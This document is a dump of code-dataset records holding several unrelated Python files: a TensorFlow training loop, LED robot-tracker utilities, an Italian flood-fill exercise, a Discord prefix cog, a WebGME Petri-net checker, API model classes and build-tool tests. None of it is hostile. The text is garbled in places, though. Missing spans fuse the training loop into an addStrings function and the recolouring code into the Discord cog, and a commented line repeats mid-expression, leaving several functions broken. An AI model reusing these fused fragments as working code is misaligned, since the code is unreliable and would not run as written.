tf.equal(tf.argmax(pred, 2, output_type=tf.int32), tf.cast(label_pl,tf.int32))\n accuracy = tf.reduce_sum(tf.cast(correct, tf.float32)) / float(BATCH_SIZE)\n tf.summary.scalar('accuracy', accuracy)\n\n print(\"--- Get training operator\")\n # Get training operator\n learning_rate = tf.constant(FLAGS.learning_rate) #get_learning_rate(global_step)\n tf.summary.scalar('learning_rate', learning_rate)\n if OPTIMIZER == 'momentum':\n optimizer = tf.train.MomentumOptimizer(learning_rate, momentum=MOMENTUM, use_nesterov=True)\n elif OPTIMIZER == 'adam':\n optimizer = tf.train.AdamOptimizer(learning_rate, epsilon=1e-4)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(total_loss, global_step=global_step)\n\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver(max_to_keep=500)\n # =====================================The End=====================================\n\n n = len([n.name for n in tf.get_default_graph().as_graph_def().node])\n print(\"*****************The Graph has %d nodes*****************\"%(n))\n\n # =================================Start a Session================================\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.allow_soft_placement = True\n config.log_device_placement = False\n\n init = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n if not os.path.exists(LOG_DIR):\n os.makedirs(LOG_DIR)\n\n with tf.Session(config=config) as sess:\n # Add summary writers\n merged = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(os.path.join(LOG_DIR, 'train'), sess.graph)\n test_writer = tf.summary.FileWriter(os.path.join(LOG_DIR, 'test'), sess.graph)\n\n sess.run(init) # Init variables\n\n # Load the model\n latest_ckpt = tf.train.latest_checkpoint(LOG_DIR)\n print(FLAGS.load_ckpt)\n if FLAGS.load_ckpt is not None:\n saver.restore(sess, FLAGS.load_ckpt)\n print('{}-Checkpoint loaded from {}!'.format(datetime.now(), FLAGS.load_ckpt))\n else:\n if latest_ckpt:\n print('{}-Found checkpoint {}'.format(datetime.now(), latest_ckpt))\n saver.restore(sess, latest_ckpt)\n print('{}-Checkpoint loaded from {} (Iter {})'.format(\n datetime.now(), latest_ckpt, sess.run(global_step)))\n\n ops = {'input_pl': input_pl,\n 'label_pl': label_pl,\n 'inner_label_pl': inner_label_pl,\n 'training_pl': training_pl,\n 'pred': pred,\n 'loss': total_loss,\n 'train_op': train_op,\n 'merged': merged,\n 'global_step': global_step,\n 'end_points': end_points}\n\n if latest_ckpt:\n checkpoint_epoch = int(latest_ckpt.split('-')[-1])+1\n elif FLAGS.load_ckpt is not None:\n checkpoint_epoch = int(FLAGS.load_ckpt.split('-')[-1])+1\n else:\n checkpoint_epoch = 0\n\n for epoch in range(checkpoint_epoch, MAX_EPOCH):\n log_string('**** EPOCH %03d ****' % (epoch))\n sys.stdout.flush()\n\n # sess.run(global_step.initializer)\n\n print('learning rate:',sess.run(learning_rate))\n print('global step:', sess.run(global_step))\n\n sess.run(train_iterator.initializer)\n train_one_epoch(sess, ops, next_train_element, train_writer)\n\n log_string(str(datetime.now()))\n log_string('---- EPOCH %03d EVALUATION ----' %(epoch))\n\n sess.run(test_iterator.initializer)\n eval_one_epoch(sess, ops, next_test_element, test_writer)\n\n save_path = saver.save(sess, os.path.join(LOG_DIR, \"model.ckpt\"), global_step=epoch)\n log_string(\"Model saved in file: %s\" % save_path)\n # =====================================The End=====================================\n\n\ndef 
train_one_epoch(sess, ops, next_train_element, train_writer):\n \"\"\" ops: dict mapping from string to tf ops \"\"\"\n log_string(str(datetime.now()))\n\n # Make sure batch data is of same size\n cur_batch_input = np.zeros((BATCH_SIZE, NUM_POINT, INPUT_DIM))\n cur_batch_label = np.zeros((BATCH_SIZE, NUM_POINT), dtype=np.int32)\n cur_batch_inner = np.zeros((BATCH_SIZE, NUM_POINT), dtype=np.int32)\n\n total_correct = 0\n total_seen = 0\n loss_sum = 0\n batch_idx = 0\n\n train_time = 0.0\n while True:\n try:\n padded_all = sess.run(next_train_element)\n bsize = padded_all.shape[0]\n #print(padded_all.shape)\n\n # remove the padded data, select NUM_POINT point using np.random.choice\n batch_input = np.zeros((bsize, NUM_POINT, INPUT_DIM))\n batch_label = np.zeros((bsize, NUM_POINT), dtype=np.int32)\n batch_inner = np.zeros((bsize, NUM_POINT), dtype=np.int32)\n for b in range(bsize):\n loc = np.where(padded_all[b,:,-1]<0)\n if len(loc[0])==0:\n num = padded_all.shape[1]\n else:\n num = loc[0][0]\n\n if num==0:\n print(loc, padded_all[b, 0:10, :])\n print('problem of train')\n exit()\n\n if num str:\n num1 = list(num1)\n num2 = list(num2)\n\n carry = 0\n res = \"\"\n\n while num1 or num2 or carry:\n if num1:\n carry += ord(num1.pop()) - ord('0')\n\n if num2:\n carry += ord(num2.pop()) - ord('0')\n\n res += str(carry % 10)\n carry //= 10\n\n return res[::-1]\n","sub_path":"addStrings.py","file_name":"addStrings.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15000345","text":"import cv2 as cv\nimport sys\nimport numpy as np\nimport pickle\nimport math\nsys.path.insert(0, r'./TadroBeaconTracker/tadro-tracker/2Led/')\nfrom logger import *\nimport operator\n\ndef add_t(a, b):\n '''dodanie dwoch punktow, tuple '''\n return tuple(map(operator.add, a, b))\n\ndef sub_t(a, b):\n '''dodanie dwoch punktow, tuple '''\n return tuple(map(operator.sub, a, b))\n\ndef save_image(image, fileName, path):\n try:\n cv.imwrite(f'{path}\\\\{fileName}.png', image)\n log_info('Zapis obrazu zakończony powodzeniem.\\n'\n f'File path: {path}\\{fileName}.bmp')\n except Exception as error:\n log_warn(f'Obraz nie został zapisany do pliku.', error)\n pass\n\ndef save_thresholds(thresholds : dict, pathToFile):\n with open(pathToFile, 'wb') as file:\n try:\n pickle.dump(thresholds, file)\n log_info('Thresholds has been saved to file.\\n'\n f'File path: {pathToFile}')\n except Exception as error:\n log_warn(f'Thresholds nie został zapisany do pliku.', error)\n pass\n\ndef load_thresholds(thresholds, pathToFile):\n try:\n with open(pathToFile, 'rb') as file:\n thresholds = pickle.load(file)\n log_info('Thresholds został załadowany.')\n return thresholds\n except Exception as error:\n log_warn(f'Thresholds nie został załadowany.', error)\n return thresholds\n finally:\n # aktualizacja pozycji sliderów\n for j in range(len(thresholds)):\n for x in ['low_red', 'high_red', 'low_green', 'high_green', 'low_blue', 'high_blue']:\n #'low_hue', 'high_hue', 'low_sat', 'high_sat', 'low_val', 'high_val']:\n cv.setTrackbarPos(x, f'Sliders_{j}', thresholds[j][x])\n\n \ndef generate_path_image(DATA, step = 1):\n #makes the output image produce RGBA (A for Alpha, allowing for transparent pixels)\n #instead of just RBG like the input image. 
4 channels instead of three\n shape = (DATA.processed_image.shape[0], DATA.processed_image.shape[1], 3)\n path_image = np.ones(shape)\n col = (0,0,0)\n counter = 0\n # for i, unpackedRobot in enumerate(DATA.robot_data):\n for i in range(0, len(DATA.robot_data), step):\n unpackedRobot = DATA.robot_data[i]\n if len(unpackedRobot) == 7:\n led1_pos, led2_pos, time, robot_center, heading, diamater, axle_len = unpackedRobot\n else:\n time, robot_center, heading, diamater, axle_len = unpackedRobot\n\n if (robot_center== None):\n continue\n '''\n if (counter == 0):\n col = np.array([255, 255, x[0]%256], copy=True)\n elif(counter == 1):\n col = np.array([x[0]%256, 255, 255], copy=True)\n elif(counter == 2):\n col = np.array([255, x[0]%256, 255], copy=True)\n \n if (x[0]%256 == 0):\n counter += 1\n counter = counter%3\n '''\n\n if (counter == 0):\n col = (255, 0, i%256)\n elif(counter == 1):\n col = (i%256, 0, 255)\n elif(counter == 2):\n col = (0, i%256, 255)\n \n if (i%256 == 0):\n counter += 1\n counter = counter%3\n \n #led2 = led2_pos\n #led1 = led1_pos\n #angle of arrow in radians\n #arrow_angle = .3\n #rotating the led1 LED about the front LED to make an arrow\n #right_shift_led1_x = int(led2[0] + (led1[0] -right_shift_led1_x = int(led2[0] + (led1[0] -right_shift_led1_x = int(led2[0] + (led1[0] - led2[0])*math.cos(arrow_angle) - (led1[1] - led2[1])*math.sin(arrow_angle))\n #right_shift_led1_y = int(led2[1] + (led1[1] - led2[1])*math.cos(arrow_angle) - (led1[0] - led2[0])*math.sin(arrow_angle))\n\n #left_shift_led1_x = int(led2[0] + (led1[0] - led2[0])*math.cos(-1*arrow_angle) - (led1[1] - led2[1])*math.sin(-1*arrow_angle))\n #left_shift_led1_y = int(led2[1] + (led1[1] - led2[1])*math.cos(-1*arrow_angle) - (led1[0] - led2[0])*math.sin(-1*arrow_angle))\n \n centre = robot_center\n head_point = add_t(centre, (20*math.cos(heading), 20*math.sin(heading)))\n head_point = tuple(map(round, head_point))\n cv.line(path_image, centre, head_point, col, 2)\n cv.circle(path_image, centre, 5, (255,255,0), 2)\n #cv.line(path_image, (right_shift_led1_x, right_shift_led1_y), led2, col, 2)\n #cv.line(path_image, (left_shift_led1_x, left_shift_led1_y), led2, col, 2) \n #log_print col\n #cv.circle(path_image, x[1], 1, copy.copy(col))\n #cv.imshow('Path_Image', path_image)\n return path_image\n\ndef draw_path_image(image, data):\n #makes the output image produce RGBA (A for Alpha, allowing for transparent pixels)\n #instead of just RBG like the input image. 
4 channels instead of three\n shape = (image.shape[0], image.shape[1], 3)\n path_image = np.zeros(shape)\n col = (0,0,0)\n counter = 0\n for i, robot in enumerate(data):\n if (robot.robot_center == None):\n continue\n '''\n if (counter == 0):\n col = np.array([255, 255, x[0]%256], copy=True)\n elif(counter == 1):\n col = np.array([x[0]%256, 255, 255], copy=True)\n elif(counter == 2):\n col = np.array([255, x[0]%256, 255], copy=True)\n \n if (x[0]%256 == 0):\n counter += 1\n counter = counter%3\n '''\n\n if (counter == 0):\n col = (255, 0, i%256)\n elif(counter == 1):\n col = (i%256, 0, 255)\n elif(counter == 2):\n col = (0, i%256, 255)\n \n if (i%256 == 0):\n counter += 1\n counter = counter%3\n \n led2 = robot.led2_pos\n led1 = robot.led1_pos\n #angle of arrow in radians\n arrow_angle = .3\n #rotating the led2 LED about the led1 LED to make an arrow\n right_shift_led2_x = int(led1[0] + (led2[0] - led1[0])*math.cos(arrow_angle) - (led2[1] - led1[1])*math.sin(arrow_angle))\n right_shift_led2_y = int(led1[1] + (led2[1] - led1[1])*math.cos(arrow_angle) - (led2[0] - led1[0])*math.sin(arrow_angle))\n\n left_shift_led2_x = int(led1[0] + (led2[0] - led1[0])*math.cos(-1*arrow_angle) - (led2[1] - led1[1])*math.sin(-1*arrow_angle))\n left_shift_led2_y = int(led1[1] + (led2[1] - led1[1])*math.cos(-1*arrow_angle) - (led2[0] - led1[0])*math.sin(-1*arrow_angle))\n\n cv.line(path_image, led2, led1, col, 2)\n cv.circle(path_image, led1 - led2, 5, (255,255,0), 2)\n #cv.line(path_image, (right_shift_led2_x, right_shift_led2_y), led1, col, 2)\n #cv.line(path_image, (left_shift_led2_x, left_shift_led2_y), led1, col, 2) \n #log_print col\n #cv.circle(path_image, x[1], 1, copy.copy(col))\n #cv.imshow('Path_Image', image)\n return path_image\n\ndef map_real_to_img(valueReal, imgMax, realMax):\n # x = xR * k\n # k = xw / xRw\n return round(valueReal * imgMax/float(realMax))\n\ndef map_point_to_img(pointReal, imgMaxTuple, realMaxTuple):\n x = round(pointReal[0] * imgMaxTuple[1]/float(realMaxTuple[1])) # x * imgW / realW\n y = round(pointReal[1] * imgMaxTuple[0]/float(realMaxTuple[0]))\n return (x, y)\n\ndef map_img_to_real(valueImg, imgMax, realMax):\n # x = xR * k\n # k = xw / xRw\n return valueImg * realMax/float(imgMax)\n\ndef map_point_to_real(pointImg, imgMaxTuple, realMaxTuple):\n x = round(pointImg[0] * realMaxTuple[1]/float(imgMaxTuple[1]))\n y = round(pointImg[1] * realMaxTuple[0]/float(imgMaxTuple[0]))\n return (x, y)","sub_path":"2Led/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"562679800","text":"'''\r\n\r\nDefiniamo adiacenti di un pixel p di un immagine i pixel adiacenti a p in orizzontale o in verticale.\r\nSe un pixel e' sul bordo dell'immagine il suo vicinato non comprende i pixel non contenuti nell'immagine.\r\nIl pixel dell'immagine con coordinate(x,y) ha dunque come adiacenti i pixel \r\ncon coordinate (x-1,y),(x+1,y),(x,y-1),(x,y+1) appartenenti all'immagine. 
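(Editorial note, in English: the paragraph above defines 4-adjacency, i.e. the neighbours of (x,y) are (x-1,y), (x+1,y), (x,y-1), (x,y+1), restricted to pixels inside the image; the next paragraph defines two pixels as connected when one can reach the other moving only across adjacent pixels of the same colour. A minimal iterative sketch of these two ideas follows; every name in it (flood_region, img, w, h) is illustrative and not part of the assignment, and the explicit queue avoids the sys.setrecursionlimit workaround used later in this file:

from collections import deque

def flood_region(img, w, h, x, y):
    # pixels connected to (x, y): reachable through horizontal/vertical
    # neighbours of the same colour; img is row-major, so pixels read img[y][x]
    target = img[y][x]
    region = {(x, y)}
    queue = deque([(x, y)])
    while queue:
        cx, cy = queue.popleft()
        for nx, ny in ((cx - 1, cy), (cx + 1, cy), (cx, cy - 1), (cx, cy + 1)):
            if 0 <= nx < w and 0 <= ny < h and (nx, ny) not in region and img[ny][nx] == target:
                region.add((nx, ny))
                queue.append((nx, ny))
    return region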
\r\n \r\nDefiniamo connessi due pixel se e' possibile da0ll'uno raggiungere l'altro spostandosi solo su \r\npixel adiacenti e dello stesso colore (ovviamente perche' cio' sia possobile e' necessario \r\nche i due pixel abbiano lo stesso colore).\r\n\r\nPer caricare e salvare immagini PNG usate le funzioni load e save che abbiamo preparato nel modulo immagini.py .\r\n\r\nScrivere una funzione ricolora(fname, lista, fnameout) che presi:\r\n- il percorso di un file che contiene un'immagine in formato PNG\r\n- una lista di quadruple del tipo (x,y,c1,c2) dove x e y sono coordinate di un pixel dell'immagine e c1 e c2 due triple colore RGB\r\n- il percorso di un file (fnameout) da creare\r\nlegge l'immagine in fname, esegue un'operazione di ricolorazione di alcuni pixel dell'immagine e \r\nregistra l'immagine ricolorata nel file fnameout.\r\n\r\nL'operazione di ricolorazione e' la seguente. Per ciascuna delle quadruple (x,y,c1,c2) della lista (nell'ordine), \r\n- tutti i pixel connessi al pixel di coordinate (x,y) nell'immagine vanno ricolorati col colore c1, \r\n- tutti i pixel del perimetro (che si trovano sul 'bordo') della zona che si e' appena colorata devono essere ricolorati col colore c2.\r\nIl perimetro della zona colorata è l'insieme dei pixel che non hanno tutti e 4 i vicini che fanno parte della zona ricolorata \r\n(ovvero almeno uno è di un colore diverso da quello che si sta ricolorando oppure almeno uno non esiste perchè sarebbe fuori dall'immagine)\r\n\r\nSi consideri ad esempio l'immagine 'I1.png', l'invocazione di ricolora('I1.png',[(10,10,(255,0,0), (0,0,255))],’OUT1.png')\r\nprodurra' l'immagine 'OUT1.png' identica all'immagine di partenza se non per il fatto che,\r\n tutti i pixel adiacenti al pixel di coordinate (10,10) (e di colore verde), verranno ricolorati \r\n di rosso ((255,0,0)), mentre i pixel sul bordo della zona inizialmente verde vengono ricolorati di blu.\r\n\r\nPer ciascuna area ricolorata bisogna inoltre calcolare area interna e perimetro, che sono definite come segue:\r\n- l'area interna e' il numero di pixel ricolorati con il colore c1\r\n- il perimetro è il numero di pixel ricolorati con il colore c2\r\n\r\nLa funzone deve tornare la lista di coppie (area interna, perimetro) nello stesso ordine in cui sono state colorate le aree.\r\n \r\nPer altri esempi vedere il file grade03.txt \r\n'''\r\n\r\nfrom immagini import *\r\nimport sys\r\nimport time\r\nsys.setrecursionlimit(5500)\r\n\r\nrosso = (255, 0, 0)\r\nblu = ( 0, 0, 255)\r\nverde = ( 0, 255, 0)\r\nnero = ( 0, 0, 0)\r\nbianco= (255, 255, 255)\r\ngiallo= (255, 255, 0)\r\ncyan = ( 0, 255, 255)\r\nmagenta= (255, 0, 255)\r\nlista=[(100,100,(255-x,255,255),(0,0,255-x)) for x in range(100)]\r\n\r\ndef ricolora(fname, lista, fnameout):\r\n '''Implementare qui la funzione'''\r\n img = load(fname)\r\n w=len(img[0])\r\n h=len(img)\r\n ris = []\r\n for task in lista:\r\n x,y,cArea,cPerim = task\r\n area, perimetro = coloraVicini(img,w,h,x,y,cArea,cPerim)\r\n ris.append((area,perimetro))\r\n\r\n \r\n save(img,fnameout)\r\n return ris\r\n\r\n\r\ndef inside(x,y,w,h):\r\n return 0<=x None:\n \"\"\"Set a new prefix for the bot in this server.\"\"\"\n sql = \"UPDATE guild_settings SET prefix=%s where guild_id=%s\"\n values = (new_prefix, ctx.guild.id)\n status = await db.sql_edit(sql, values)\n await db.cache_prefixes()\n if status:\n await ctx.send(f\"Prefix has been updated to {new_prefix}\")\n else:\n await ctx.send(\"Prefix could not be changed.\")\n\n\ndef setup(bot):\n bot.add_cog(GuildSettings(bot))\n 
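    # editorial note: setup() is the entry point discord.py calls when this
    # cog is loaded via bot.load_extension. The UPDATE statement earlier in
    # this cog passes the user-supplied prefix through the values tuple rather
    # than string formatting; assuming db.sql_edit forwards it as a query
    # parameter, the new prefix cannot inject SQL.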
logger.info(\"loaded\")\n","sub_path":"cogs/guild_settings.py","file_name":"guild_settings.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"534502808","text":"\"\"\"\nThis is where the implementation of the plugin code goes.\nThe StateMachine-class is imported from both run_plugin.py and run_debug.py\n\"\"\"\nimport sys\nimport logging\nfrom webgme_bindings import PluginBase\n\n# Setup a logger\nlogger = logging.getLogger('StateMachine')\nlogger.setLevel(logging.INFO)\nhandler = logging.StreamHandler(sys.stdout) # By default it logs to stderr..\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass StateMachine(PluginBase):\n def main(self):\n core = self.core\n root_node = self.root_node\n META = self.META\n active_node = self.active_node\n\n places = []\n placesPaths = []\n transitions = []\n transitionPaths = []\n arcs = []\n\n #Collect all nodes\n nodes = core.load_sub_tree(active_node)\n\n #Separate nodes into types\n for node in nodes:\n if core.get_attribute(node, 'name') in (\"Place-Transition\", \"Transition-Place\"):\n arcs.append(node)\n elif core.get_attribute(node, 'name') in (\"Transition\"):\n transitions.append(node)\n elif core.get_attribute(node, 'name') in (\"Place\"):\n places.append(node)\n\n #Add transition paths to an array\n for transition in transitions:\n transitionPaths.append(core.get_path(transition))\n \n #Add place paths to an array\n for place in places:\n placesPaths.append(core.get_path(place))\n\n def isStateMachine():\n #Check if any Transitions dst is listed twice\n for path in transitionPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'dst'):\n inplaceCt = inplaceCt + 1\n if inplaceCt > 1:\n return False\n\n #Check if any Transitions src is listed twice\n for path in transitionPaths:\n outplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'src'):\n outplaceCt = outplaceCt + 1\n if outplaceCt > 1:\n return False\n \n return True\n\n def isMarkedGraph():\n #Check that every Place is listed exactly once as a Dst\n for path in placesPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'dst'):\n inplaceCt = inplaceCt + 1\n if inplaceCt != 1:\n return False\n\n #Check that every Place is listed exactly once as a Src\n for path in placesPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'src'):\n inplaceCt = inplaceCt + 1\n if inplaceCt != 1:\n return False \n\n return True\n\n def isFreeChoice():\n #Check if any Transition dst is listed twice\n for path in transitionPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'dst'):\n inplaceCt = inplaceCt + 1\n if inplaceCt > 1:\n return False \n return True\n\n def isWorkflowNet():\n nodeSrc = {}\n #Check if there is a start node (Place node without an incoming arc)\n for path in placesPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'dst'):\n inplaceCt = inplaceCt + 1\n nodeSrc[path] = inplaceCt\n\n\n val_list = list(nodeSrc.values())\n\n #Fail if there is more than 1 start node\n if val_list.count(0)>1:\n return False\n\n position = val_list.index(0)\n key_list = list(nodeSrc.keys())\n\n startNode = key_list[position]\n\n self.send_notification(f\"Start Node - {startNode}\")\n\n\n #Check if there is an end 
node (Place node without an incoming arc\n for path in placesPaths:\n inplaceCt = 0\n for arc in arcs:\n if path == core.get_pointer_path(arc, 'src'):\n inplaceCt = inplaceCt + 1\n nodeSrc[path] = inplaceCt\n\n val_list = list(nodeSrc.values())\n\n #Fail if there is more than 1 end node\n if val_list.count(0)>1:\n return False\n\n position = val_list.index(0)\n key_list = list(nodeSrc.keys())\n\n endNode = key_list[position]\n\n self.send_notification(f\"End Node - {endNode}\")\n\n #Check if every Place node can reach the start node\n\n #Check if every Place node can reach the end node\n return False\n \n\n StateMachineResult = isStateMachine()\n FreeChoiceResult = isFreeChoice()\n MarkedGraphResult = isMarkedGraph()\n WorkflowNetResult = isWorkflowNet()\n\n self.send_notification(f\"StateMachine - {StateMachineResult}\")\n self.send_notification(f\"Free Choice - {FreeChoiceResult}\")\n self.send_notification(f\"Marked Graph - {MarkedGraphResult}\")\n self.send_notification(f\"Workflow Net - {WorkflowNetResult}\")\n \n \n \n \n \n \n \n \n","sub_path":"src/plugins/StateMachine/StateMachine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"177024680","text":"from copy import deepcopy\n\nfrom sendbee_api.fields import Field, ModelField, NumberField, TextField\n\n\nclass Model:\n \"\"\"Abstract model class.\"\"\"\n\n def __init__(self, item):\n self.item = item\n self.attributes = {}\n\n def __getattr__(self, item):\n if item in self.attributes.keys():\n attr = self.attributes.get(item)\n if attr:\n return self.attributes.get(item).value\n else:\n return attr\n else:\n raise AttributeError(item)\n\n @classmethod\n def process(cls, data):\n \"\"\"Transform raw data into models.\"\"\"\n\n model_list = []\n\n # iterate over formatted data from API call\n for item in data:\n\n # instantiate model with one row of data\n model_object = cls(item)\n\n # iterate over model properties\n for model_property in list(cls.__dict__):\n\n # invoke model property\n property_object = getattr(model_object,\n model_property)\n\n if isinstance(property_object, ModelField):\n\n # recursion:\n # if the instance of the field class is ModeClass\n # run process on that model with only a portion of data\n if isinstance(item[property_object.index], list):\n models = property_object.model_cls.process(\n item[property_object.index]\n )\n elif isinstance(item[property_object.index], dict):\n models = property_object.model_cls.process(\n [item[property_object.index]]\n )[0]\n\n setattr(model_object, model_property[1:], models)\n\n elif isinstance(property_object, Field):\n\n # convert raw property data into corespondent\n # data type defined by the Field class\n property_object.convert_item(model_object)\n\n # set model property value with formatted data\n if property_object.value is None:\n model_object.attributes[model_property[1:]] = None\n else:\n model_object.attributes[model_property[1:]] = \\\n deepcopy(property_object)\n\n model_list.append(model_object)\n\n return model_list\n\n\nclass Meta(Model):\n\n _total = NumberField(index='total', desc=\"Total\")\n _items_to = NumberField(index='to', desc=\"Items To\")\n _items_from = NumberField(index='from', desc=\"Items From\")\n _per_page = NumberField(index='per_page', desc=\"Per Page\")\n _last_page = NumberField(index='last_page', desc=\"Last Page\")\n _current_page = NumberField(index='current_page', desc=\"Current Page\")\n\n\nclass 
ServerMessage(Model):\n\n _message = TextField(index='message', desc='Message from the server')\n","sub_path":"sendbee_api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"379601835","text":"import scipy.sparse as sps\nfrom sklearn.preprocessing import scale\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import Imputer\n\n\n#Categorical: a boolean array indicating which feature is categorical\n#bool_Imputer, bool_Standardization and bool_OneHotEncoder: boolean variables indicating whether to perform this type of data preprocessing method or not\n\n\ndef DataPreprocessing(Data_numeric, Categorical, bool_Imputer=True, bool_Standardization=True, bool_OneHotEncoder=True):\n \n if sps.issparse(Data_numeric):\n Data_numeric = Data_numeric.todense()\n\n if bool_Imputer:\n # whether there exist categorical features\n bool_cat = bool(np.sum(np.isfinite(np.where(np.asarray(Categorical)==True))))\n # whether there exist noncategorical features\n bool_noncat = bool(np.sum(np.isfinite(np.where(np.asarray(Categorical)==False))))\n \n \n if bool_cat:\n # categorical features\n Data_numeric_cat = Data_numeric[:,Categorical]\n # imputer for missing entries\n imp_cat = Imputer(missing_values='NaN', strategy='most_frequent', axis=0, copy=False)\n imp_cat.fit(Data_numeric_cat)\n Data_numeric_cat = imp_cat.transform(Data_numeric_cat)\n # number of categorical features\n num_cat = Data_numeric_cat.shape[1]\n \n \n if bool_noncat:\n \n #noncategorical features\n Data_numeric_noncat = Data_numeric[:,np.invert(Categorical)]\n imp_noncat = Imputer(missing_values='NaN', strategy='mean', axis=0, copy=False)\n imp_noncat.fit(Data_numeric_noncat)\n Data_numeric_noncat = imp_noncat.transform(Data_numeric_noncat)\n #number of noncategorical features\n num_noncat = Data_numeric_noncat.shape[1]\n\n #true if there exist both categorical and noncategorical features\n if bool_cat*bool_noncat:\n \n Data_numeric = np.concatenate((Data_numeric_cat, Data_numeric_noncat), axis=1)\n Categorical = [True for i in range(num_cat)] + [False for i in range(num_noncat)]\n\n #true if there only exist categorical features\n elif bool_cat*(not bool_noncat):\n Data_numeric = Data_numeric_cat\n Categorical = [True for i in range(num_cat)]\n \n #true if there only exist noncategorical features\n elif (not bool_cat)*bool_noncat:\n Data_numeric = Data_numeric_noncat\n Categorical = [False for i in range(num_noncat)]\n\n # OneHotEncoding for categorical features\n if bool_OneHotEncoder:\n \n #check if there exist categorical features\n if np.sum(np.isfinite(np.where(np.asarray(Categorical) == True))):\n enc=OneHotEncoder(categorical_features = Categorical)\n enc.fit(Data_numeric)\n Data_numeric = enc.transform(Data_numeric).toarray()\n \n # Standardization of all features\n if bool_Standardization:\n if bool_OneHotEncoder:\n Data_numeric = scale(Data_numeric)\n \n #check if there exist numerical features\n elif np.sum(np.isfinite(np.where(np.asarray(Categorical) == False))):\n Data_numeric[:,np.invert(Categorical)] = scale(Data_numeric[:,np.invert(Categorical)])\n\n print(\"DataPreprocessing finished\")\n return Data_numeric, Categorical\n","sub_path":"automl/preprocesser.py","file_name":"preprocesser.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"341006803","text":"# coding=utf-8\n# 
Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport unittest\n\nfrom pants.java.jar.jar_dependency_utils import M2Coordinate, ResolvedJar\n\n\nclass JarDependencyUtilsTest(unittest.TestCase):\n def test_m2_string_representation(self):\n org_name_ref = M2Coordinate(org='org.example', name='lib', rev='the-rev')\n\n self.assertEquals('org.example:lib:the-rev', str(org_name_ref))\n self.assertEquals(org_name_ref, M2Coordinate.from_string(str(org_name_ref)))\n\n org_name_ref_classifier = M2Coordinate(org='org.example', name='lib',\n rev='the-rev', classifier='classify')\n\n self.assertEquals('org.example:lib:jar:classify:the-rev', str(org_name_ref_classifier))\n self.assertEquals(org_name_ref_classifier, M2Coordinate.from_string(str(org_name_ref_classifier)))\n\n org_name_classifier = M2Coordinate(org='org.example', name='lib', classifier='classify')\n\n self.assertEquals('org.example:lib:jar:classify:', str(org_name_classifier))\n self.assertEquals(org_name_classifier, M2Coordinate.from_string(str(org_name_classifier)))\n\n org_name_type_classifier = M2Coordinate(org='org.example', name='lib',\n classifier='classify', ext='zip')\n\n self.assertEquals('org.example:lib:zip:classify:', str(org_name_type_classifier))\n self.assertEquals(org_name_type_classifier, M2Coordinate.from_string(str(org_name_type_classifier)))\n\n org_name_type_jar_classifier = M2Coordinate(org='org.example', name='lib',\n classifier='classify', ext='jar')\n\n self.assertEquals('org.example:lib:jar:classify:', str(org_name_type_jar_classifier))\n self.assertEquals(org_name_type_jar_classifier, M2Coordinate.from_string(str(org_name_type_jar_classifier)))\n\n def test_m2_coordinates_with_same_properties(self):\n coordinate1 = M2Coordinate('org.example', 'lib')\n coordinate2 = M2Coordinate('org.example', 'lib')\n\n self.assertEqual(coordinate1, coordinate2)\n self.assertEqual(hash(coordinate1), hash(coordinate2))\n\n def test_m2_coordinates_with_differing_properties_not_equal(self):\n coordinate1 = M2Coordinate('org.example', 'lib')\n coordinate2 = M2Coordinate('org.example', 'lib2')\n\n self.assertNotEqual(coordinate1, coordinate2)\n\n def test_m2_coordinates_with_different_types_have_different_hashes(self):\n coordinate1 = M2Coordinate('org.example', 'lib', ext='zip')\n coordinate2 = M2Coordinate('org.example', 'lib')\n\n self.assertNotEqual(hash(coordinate1), hash(coordinate2))\n\n def test_m2_coordinate_artifact_path_no_rev(self):\n coordinate = M2Coordinate('org.example', 'lib')\n\n self.assertEqual('org.example-lib.jar', coordinate.artifact_filename)\n\n def test_m2_coordinate_artifact_path_no_classifier(self):\n coordinate = M2Coordinate('org.example', 'lib', '1.0.0')\n\n self.assertEqual('org.example-lib-1.0.0.jar', coordinate.artifact_filename)\n\n def test_m2_coordinate_artifact_path_classifier(self):\n coordinate = M2Coordinate('org.example', 'lib', '1.0.0', 'sources')\n\n self.assertEqual('org.example-lib-1.0.0-sources.jar', coordinate.artifact_filename)\n\n def test_m2_coordinate_artifact_path_explicit_ext(self):\n coordinate = M2Coordinate('org.example', 'lib', '1.0.0', ext='tar.gz')\n\n self.assertEqual('org.example-lib-1.0.0.tar.gz', coordinate.artifact_filename)\n\n def 